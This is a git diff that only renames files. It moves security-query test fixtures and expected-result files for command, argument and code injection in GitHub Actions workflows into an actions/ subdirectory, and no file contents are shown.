rename from ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
rename to actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml
rename to actions/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml
diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml
rename to actions/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
rename to actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref
rename to actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected
rename to actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref
rename to actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref
diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml
rename to actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml
diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected
rename to actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected
diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref
rename to actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref
diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected
similarity index 100%
rename from ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected
rename to actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected
diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref
similarity index 100%
rename from ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref
rename to actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml
rename to actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml
